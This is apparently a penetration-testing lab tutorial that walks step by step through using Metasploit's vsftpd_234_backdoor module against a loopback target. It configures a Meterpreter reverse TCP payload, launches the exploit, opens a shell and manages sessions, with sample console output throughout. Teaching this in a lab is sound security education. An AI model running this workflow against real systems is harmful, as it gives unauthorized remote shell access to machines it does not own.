Introduction
Welcome to the world of penetration testing with Metasploit! The Metasploit Framework is a powerful open-source tool used by cybersecurity professionals to probe for vulnerabilities on networks and servers.
In this lab, you will walk through a classic and straightforward exploit. We have set up a simulated environment where a server is running a vulnerable version of the VSFTPD (Very Secure FTP Daemon), specifically version 2.3.4. This particular version contains a well-known backdoor that was secretly added to its source code.
Your goal is to use the Metasploit console (msfconsole) to find, configure, and launch an exploit against this service to gain a command shell on the target system. This hands-on exercise will teach you the fundamental workflow of using Metasploit for a simple exploit execution.
Let's get started!
Select Vulnerable Service Exploit with use exploit/unix/ftp/vsftpd_234_backdoor
In this step, you will launch the Metasploit console and select the appropriate exploit module for the VSFTPD 2.3.4 backdoor. The msfconsole is the primary interface for the Metasploit Framework.
First, start the Metasploit console. We'll use the -q (quiet) flag to skip the banner and start faster.
msfconsole -q
Once the console is loaded, your prompt will change to msf >. Now, you need to tell Metasploit which exploit you want to use. The use command loads a specific module. The module for the VSFTPD 2.3.4 backdoor is located at exploit/unix/ftp/vsftpd_234_backdoor.
Execute the following command in the Metasploit console:
use exploit/unix/ftp/vsftpd_234_backdoor
After running the command, you'll notice that your prompt changes to include the name of the selected exploit module. This indicates that the module is now active and ready for configuration.
Depending on your Metasploit version, a default payload might be selected automatically (e.g. cmd/linux/http/x86/meterpreter_reverse_tcp). This payload requires two settings:
- LHOST - The IP where Metasploit listens for the reverse connection. Use
127.0.0.1for this lab:
set LHOST 127.0.0.1
- Encoder - The default encoder may fail with "All encoders failed to encode." Set the encoder to
generic/noneto avoid encoding:
set Encoder generic/none
Set Target IP with set RHOSTS target_ip
In this step, you will configure the exploit by setting the target host's IP address. Most Metasploit modules require you to specify a target. The option for the remote target host(s) is RHOSTS.
Since the vulnerable FTP service is running on the same machine you are on (our lab environment), you can use the loopback IP address, which is 127.0.0.1.
To set this option, use the set command followed by the option name (RHOSTS) and its value (127.0.0.1).
Enter the following command in your msfconsole:
set RHOSTS 127.0.0.1
Metasploit will confirm the setting by printing the option and its new value.
RHOSTS => 127.0.0.1
You have now told Metasploit where to direct the attack.
Verify Exploit Options with show options
In this step, you will verify that all required options for the exploit are correctly set before launching it. This is a crucial best practice to ensure your exploit is configured properly.
The show options command displays all the configurable options for the currently loaded module, their current settings, and whether they are required.
Run the following command in your msfconsole:
show options
You will see a table listing the module options and payload options.
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
...
Observe the output. Ensure RHOSTS is 127.0.0.1 and LHOST is 127.0.0.1. The RPORT is 21 (FTP). With all required options set, you are ready to proceed.
Execute Exploit with exploit Command
Now that the exploit is configured, you will execute it against the target. The exploit command (which can be shortened to run) launches the attack based on the current module and settings.
Execute the exploit by typing the following command and pressing Enter:
exploit
TROUBLESHOOTING: If you see
Msf::OptionValidateError One or more options failed to validate: LHOST, runset LHOST 127.0.0.1. If you seeAll encoders failed to encode, runset Encoder generic/noneto disable encoding. Then runexploitagain.
WARNING: The first attempt might fail with "Unable to connect to backdoor on 6200/TCP. Cooldown?" or "Exploit completed, but no session was created." If this happens, simply run the
exploitcommand again - the second attempt should succeed.
Metasploit will now attempt to exploit the backdoor. You will see output detailing the steps of the attack. If successful, it will trigger the backdoor and open a Meterpreter session.
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Important: After the exploit succeeds, you will be dropped into a Meterpreter prompt. This is the successful remote access! You can run shell to get an interactive command shell, then run whoami or id to confirm you have access:
shell
Process 1234 created.
Channel 1 created.
whoami
labex
Congratulations, you have successfully gained remote access!
Check Session with sessions -l
In this step, you will learn how to manage the active connection, or "session," that you've just opened. Metasploit allows you to have multiple sessions open at once and switch between them.
First, to return to the msfconsole prompt without closing your session, you need to background it. Press Ctrl+Z on your keyboard. If you are inside a shell (after running shell), type y to background the channel - you will return to meterpreter >. Press Ctrl+Z again and type y when prompted to background the session:
Background session 1? [y/N] y
msf exploit(unix/ftp/vsftpd_234_backdoor) >
The sessions command only works at the main Metasploit prompt (msf exploit(...) >), not inside Meterpreter. You are now back at the main Metasploit prompt. To see a list of all your active sessions, use the sessions command with the -l (list) flag.
sessions -l
This will display a table of all backgrounded sessions, including their ID, type, and connection information.
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux 127.0.0.1:4444 -> 127.0.0.1:xxxxx (127.0.0.1)
You can see your session listed with an ID of 1. If you wanted to interact with it again, you would use the command sessions -i 1. This session management is a key feature of Metasploit.
Summary
Congratulations! You have successfully completed this lab and performed your first exploit using the Metasploit Framework.
In this lab, you have learned the fundamental workflow of a penetration test with Metasploit:
- Starting the Metasploit console (
msfconsole). - Selecting a specific exploit module with the
usecommand. - Configuring the module's target with the
setcommand. - Verifying the configuration with
show options. - Launching the attack using the
exploitcommand. - Managing the resulting connection using
sessions.
This basic pattern of "select, configure, exploit" is the foundation for almost all activities you will perform within Metasploit. You are now equipped with the core knowledge to explore more complex exploits and payloads.
